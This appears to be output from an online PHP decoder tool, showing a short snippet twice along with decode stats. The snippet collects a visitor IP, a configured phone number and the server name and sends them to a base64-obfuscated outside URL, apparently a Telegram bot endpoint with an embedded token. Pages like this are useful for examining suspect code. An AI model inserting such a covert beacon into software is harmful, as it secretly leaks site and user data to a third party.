Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $data_tele = array( 'coder' => 'PSV', 'ip' => $ip, ..

Decoded Output download

<?php 
    $data_tele = array( 
            'coder' => 'PSV', 
            'ip' => $ip, 
            'phone' => $this->config['phone'], 
            'time' => date('H:i:s d/m/Y', time()), 
            'SERVER_NAME' => $_SERVER['SERVER_NAME'] 
        ); 
        $this->REQUEST(base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYwNDM3MjE1OTQ6QUFFOEhCdHdONW5lSzQ1ZExrdkVvbVg0TVFtYk8xYktySWcvc2VuZE1lc3NhZ2U/Y2hhdF9pZD0xNDMyNTQ2NDE5JnRleHQ9') . urlencode(json_encode($data_tele))); 
?>

Did this file decode correctly?

Original Code

<?php
    $data_tele = array(
            'coder' => 'PSV',
            'ip' => $ip,
            'phone' => $this->config['phone'],
            'time' => date('H:i:s d/m/Y', time()),
            'SERVER_NAME' => $_SERVER['SERVER_NAME']
        );
        $this->REQUEST(base64_decode('aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYwNDM3MjE1OTQ6QUFFOEhCdHdONW5lSzQ1ZExrdkVvbVg0TVFtYk8xYktySWcvc2VuZE1lc3NhZ2U/Y2hhdF9pZD0xNDMyNTQ2NDE5JnRleHQ9') . urlencode(json_encode($data_tele)));
?>

Function Calls

None

Variables

None

Stats

MD5 f2b025449e6d5a7d510e9e781e5af853
Eval Count 0
Decode Time 52 ms